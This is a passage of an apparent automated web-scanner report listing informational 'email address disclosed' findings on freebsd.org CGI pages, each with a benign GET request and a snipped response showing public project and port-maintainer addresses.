24.272. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/suck

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/suck HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/suck/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.273. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck-cnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/suck-cnews

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/suck-cnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/suck-cnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.274. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/tin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/tin

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/tin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/tin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.275. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/trn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/trn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/trn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.276. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/trn4

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/trn4 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/trn4/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.277. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/ubh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/ubh

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/ubh HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/ubh/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.278. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/unpost

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/unpost

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/unpost HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/unpost/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.279. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xmitbin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/xmitbin

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xmitbin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xmitbin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.280. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xpn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/xpn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xpn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xpn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.281. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xrn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/xrn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.282. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yencode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/yencode

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/yencode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/yencode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.283. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yydecode

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/yydecode

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/yydecode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/yydecode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.284. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/mozex

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/www/mozex

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/www/mozex HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/mozex/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.285. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7116

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.286. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/pnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/www/pnews

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/www/pnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/pnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.287. http://www.freebsd.org/cgi/pds.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/pds.cgi

Issue detail

The following email address was disclosed in the response:
  • ports@FreeBSD.org

Request

GET /cgi/pds.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports downlo
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.288. http://www.freebsd.org/cgi/ports.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/ports.cgi

Issue detail

The following email addresses were disclosed in the response:
  • ports@FreeBSD.org
  • www@FreeBSD.org

Request

GET /cgi/ports.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports Search
...[SNIP]...
<a href="mailto:www@FreeBSD.org">www@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:ports@FreeBSD.org"><i>ports@FreeBSD.org</i>
...[SNIP]...
<a href='../mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.289. http://www.freebsd.org/cgi/search.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/search.cgi

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/search.cgi HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:31 GMT
Server: Apache/1.3.x Sausalito (Unix)
Content-Type: text/html
Connection: close
Content-Length: 6140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Mail Archive Search<
...[SNIP]...
<a href='../mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.290. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • dougb@FreeBSD.org
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/mail/alpine/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Doug Barton
dougb@FreeBSD.org
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.291. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • mich@FreeBSD.org
  • newspost@unixcab.org
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/newspost/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>
AUTHOR:        Jim Faulkner &lt;newspost@unixcab.org>

   - Michael L. Hostbaek
   mich@FreeBSD.org
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.292. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • miki@ceti.pl
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/yydecode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:45 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Mikolaj Rydzewski
miki@ceti.pl
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.293. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • ports@FreeBSD.org
  • wizard@vlink.ru

Request

GET /cgi/url.cgi?ports/news/gup/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
Update Program is a Unix mail-server that lets a remote
site change their newsgroups subscription without requiring the
intervention of the news administrator at the feed site.

-- Denis Shaposhnikov
wizard@vlink.ru
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.294. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • john@zoner.org
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/ubh/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:42 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

[ This port is maintained by John Holland &lt;john@zoner.org>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.295. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • ehaupt@critical.ch
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/brag/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- ehaupt
ehaupt@critical.ch
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.296. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • ggr@usenix.org
  • ports@FreeBSD.org
  • prz@acm.org

Request

GET /cgi/url.cgi?ports/news/pgpmoose/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
PGP Moose / by Greg Rose &lt;ggr@usenix.org>
...[SNIP]...
to use others, such as
the Digital Signature Standard. PGP was chosen for
its widespread availability around the world.
PGP, the crux of the cryptographic software, was
written by Phil Zimmermann &lt;prz@acm.org>, who
otherwise has nothing to do with this. The
cryptographic framework was written by Greg Rose
&lt;ggr@usenix.org>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.297. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • pfeifer@ls6.informatik.uni-dortmund.de
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/p5-NNML/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
NNML::Server server implements a minimal NNTP server. It is (hope-)
fully conformant to rfc977. In addition the commands XOVER and
AUTHINFO are implemented.

Author:    Ulrich Pfeifer &lt;pfeifer@ls6.informatik.uni-dortmund.de>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.298. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • fox@roestock.demon.co.uk
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/slurp/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:33 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
r local news system or
forwarding on via UUCP to another news system. It replaces nntpxfer
from the NNTP 1.5.12 reference implementation and nntpget from the INN
distribution.

Patches from Peter Fox (fox@roestock.demon.co.uk) have been added to
avoid downloading articles from certain sites. To make use of this
facility, create a file ${PREFIX}/news/lib/excludesites and list the
sites in it, eg

fritter.spam.com
hackers.o
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.299. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • ports@FreeBSD.org
  • skv@FreeBSD.org

Request

GET /cgi/url.cgi?ports/www/p5-Apache-NNTPGateway/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
